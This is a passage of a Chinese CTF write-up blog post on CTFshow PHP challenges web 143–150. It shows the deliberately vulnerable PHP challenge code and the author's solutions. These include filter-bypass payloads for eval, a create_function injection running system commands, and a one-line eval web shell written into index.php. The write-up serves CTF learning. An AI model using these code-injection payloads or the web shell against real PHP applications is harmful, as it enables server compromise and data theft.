class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\&#123;|\&#125;|\~|\%|\&amp;|\;/i&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;get out hacker!&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>更改正则使用异或绕过</p>
<h1 id="web-144"><a href="#web-144" class="headerlink" title="web 144"></a>web 144</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; check(<span class="variable">$v3</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^\W+$/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> strlen(<span class="variable">$str</span>)===<span class="number">1</span>?<span class="literal">true</span>:<span class="literal">false</span>;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h1 id="web-145"><a href="#web-145" class="headerlink" title="web 145"></a>web 145</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z]|[0-9]|\@|\!|\+|\-|\.|\_|\$|\&#125;|\%|\&amp;|\;|\&lt;|\&gt;|\*|\/|\^|\#|\&quot;/i&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;get out hacker!&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>测试：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="string">&quot;return 1?phpinfo():1;&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>这是可以运行出来的</p>
<p>没有过滤~直接取反绕过</p>
<h1 id="web-146"><a href="#web-146" class="headerlink" title="web 146"></a>web 146</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z]|[0-9]|\@|\!|\:|\+|\-|\.|\_|\$|\&#125;|\%|\&amp;|\;|\&lt;|\&gt;|\*|\/|\^|\#|\&quot;/i&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;get out hacker!&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>又增加了分号的过滤，所以我们没法用三目运算符了，这时候想到了等号和位运算符</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="string">&quot;return 1==phpinfo()||1;&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>直接取反绕过即可</p>
<h1 id="web-147"><a href="#web-147" class="headerlink" title="web 147"></a>web 147</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ctf&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$ctfshow</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;ctf&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/^[a-z0-9_]*$/isD&#x27;</span>,<span class="variable">$ctfshow</span>)) &#123;</span><br><span class="line">        <span class="variable">$ctfshow</span>(<span class="string">&#x27;&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;show&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><strong>分析正则表达式：</strong><br> <code>/i</code>不区分大小写<br> <code>/s</code>匹配任何不可见字符，包括空格、制表符、换页符等等，等价于<code>[\f\n\r\t\v]</code><br> <code>/D</code>如果使用$限制结尾字符,则不允许结尾有换行</p>
<p><strong>create_function:</strong></p>
<p><a target="_blank" rel="noopener" href="https://paper.seebug.org/755/">参考这篇文章第一道题</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。</span><br><span class="line"></span><br><span class="line">string create_function    ( string $args   , string $code   )</span><br><span class="line"></span><br><span class="line">string $args 参数部分</span><br><span class="line">string $code 方法代码部分</span><br><span class="line"></span><br><span class="line">举例：</span><br><span class="line"></span><br><span class="line">create_function(&#x27;$name&#x27;,&#x27;echo $fname.&quot;Zhang&quot;&#x27;)</span><br><span class="line">类似于：</span><br><span class="line"></span><br><span class="line">function fT($name) &#123;</span><br><span class="line">  echo $fname.&quot;Zhang&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>绕过匹配的方式很简单：需要在开头或者结尾找到一一个字符同时不影响函数的正常调用</p>
<p>现场制作一个fuzz用的字典：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$myfile</span> = fopen(<span class="string">&quot;ascii.txt&quot;</span>,<span class="string">&quot;w&quot;</span>);</span><br><span class="line"><span class="keyword">for</span>(<span class="variable">$i</span> = <span class="number">0</span>;<span class="variable">$i</span> &lt; <span class="number">129</span>; <span class="variable">$i</span>++)&#123;</span><br><span class="line">	<span class="variable">$a</span> = chr(<span class="variable">$i</span>);</span><br><span class="line">	<span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/[a-z0-9]/isD&#x27;</span>,<span class="variable">$a</span>))&#123;</span><br><span class="line">		preg_replace(<span class="string">&#x27;/[a-z0-9]/isD&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$a</span>);</span><br><span class="line">		<span class="variable">$b</span> = urlencode(<span class="variable">$a</span>).<span class="string">&quot;\n&quot;</span>;</span><br><span class="line">		<span class="comment">//$c = &quot;未编码：&quot;.$a.&quot;经过编码：&quot;.$b.&quot;\n&quot;;</span></span><br><span class="line">		fwrite(<span class="variable">$myfile</span>,<span class="variable">$b</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//echo $c;</span></span><br><span class="line">&#125;</span><br><span class="line">fclose(<span class="variable">$myfile</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后复制本题目代码本地搭建：开始寻找命中字符</p>
<p>先构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">create_function(&#x27;&#x27;,$_GET[&#x27;show&#x27;])</span><br><span class="line">function hacker($hackername) &#123;</span><br><span class="line">	&#125;echo &quot;yn8rt&quot;;//</span><br><span class="line">&#125;</span><br><span class="line">所以：</span><br><span class="line">create_function(&#x27;&#x27;,&#x27;&#125;echo &quot;yn8rt&quot;;//&#x27;)</span><br><span class="line">payload:</span><br><span class="line">?show=&#125;echo &quot;yn8rt&quot;;//</span><br><span class="line">post:ctf=%create_function</span><br></pre></td></tr></table></figure>

<p>开始fuzz：</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9d8148dd7353af8c807d7e233b2a3037.png" alt="img"></p>
<p>payload：</p>
<p>?show=}system(‘tac f*’);//</p>
<p>ctf=%5ccreate_function</p>
<p>而事实上%5c就是\：</p>
<p>在PHP的命名空间默认为\，所有的函数和类都在\这个命名空间中，如果直接写函数名function_name()调用，调用的时候其实相当于写了一个相对路径；而如果写\function_name()这样调用函数，则其实是写了一个绝对路径。如果你在其他namespace里调用系统类，就必须写绝对路径这种写法</p>
<h1 id="web-148"><a href="#web-148" class="headerlink" title="web 148"></a>web 148</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[A-Za-z0-9_\%\\|\~\&#x27;\,\.\:\@\&amp;\*\+\- ]+/&quot;</span>,<span class="variable">$code</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    @<span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_ctfshow_fl0g</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">code=$哈=&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;;$&#123;$哈&#125;[哼]($&#123;$哈&#125;[嗯]);&amp;哼=system&amp;嗯=tac f*</span><br><span class="line">&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;; 异或出来的结果是 _GET</span><br><span class="line">$&#123;_GET&#125;[哼]($&#123;_GET&#125;[嗯]);&amp;哼=call_user_func&amp;嗯=get_ctfshow_fl0g</span><br></pre></td></tr></table></figure>

<p>这里是直接一个回调，利用现成的函数来读取flag.php</p>
<h1 id="web-149"><a href="#web-149" class="headerlink" title="web 149"></a>web 149</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$files</span> = scandir(<span class="string">&#x27;./&#x27;</span>); </span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123;</span><br><span class="line">            unlink(<span class="variable">$file</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">file_put_contents(<span class="variable">$_GET</span>[<span class="string">&#x27;ctf&#x27;</span>], <span class="variable">$_POST</span>[<span class="string">&#x27;show&#x27;</span>]);</span><br><span class="line"></span><br><span class="line"><span class="variable">$files</span> = scandir(<span class="string">&#x27;./&#x27;</span>); </span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123;</span><br><span class="line">            unlink(<span class="variable">$file</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>方法一：</p>
<p>你不删除index.php，那么我就往index.php中写个木马</p>
<pre><code>?ctf=index.php
show=&lt;?php @eval($_POST[&#39;yn8rt&#39;]);?&gt;
</code></pre>
<p>方法二：</p>
<p>条件竞争：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?ctf=1.php</span><br><span class="line">show=&lt;?php system(&#x27;tac /f*&#x27;);?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-150"><a href="#web-150" class="headerlink" title="web 150"></a>web 150</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">CTFSHOW</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$username</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$password</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$vip</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$secret</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;vip = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;secret = <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;secret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">isVIP</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;vip?<span class="literal">TRUE</span>:<span class="literal">FALSE</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__autoload</span>(<span class="params"><span class="variable">$class</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$class</span>))&#123;</span><br><span class="line">            <span class="variable">$class</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">#过滤字符</span></span><br><span class="line"><span class="variable">$key</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\_| |\[|\]|\?/&#x27;</span>, <span class="variable">$key</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$ctf</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;ctf&#x27;</span>];</span><br><span class="line">extract(<span class="variable">$_GET</span>);</span><br><span class="line"><span class="keyword">if</span>(class_exists(<span class="variable">$__CTFSHOW__</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;class is exists!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$isVIP</span> &amp;&amp; strrpos(<span class="variable">$ctf</span>, <span class="string">&quot;:&quot;</span>)===<span class="literal">FALSE</span>)&#123;</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$ctf</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">惜缘怀古</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://xiyuanhuaigu.gitee.io/2022/08/07/CTFshow%20php%E7%89%B9%E6%80%A7/">https://xiyuanhuaigu.gitee.io/2022/08/07/CTFshow%20php%E7%89%B9%E6%80%A7/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://xiyuanhuaigu.gitee.io" target="_blank">惜缘怀古的博客</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/08/09/MYSQL-%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%89%E8%A3%85%E4%B8%8E%E9%85%8D%E7%BD%AE/"><img class="prev-cover" src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/984265fdc4efa6b1f225f1ad67cdfd62f8231474_raw.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">MYSQL 数据库安装与配置</div></div></a></div><div class="next-post pull-right"><a href="/2022/08/04/CTFshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"><img class="next-cover" src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/c05df803eb620eb6d1a10f7eb455e4af3c9d010b_raw.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">CTFshow文件包含</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/2.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">惜缘怀古</div><div class="author-info__description">唯有那份炫目，未曾忘却</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">66</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><a class="button--animated" id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn card-announcement-animation"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#web-89"><span 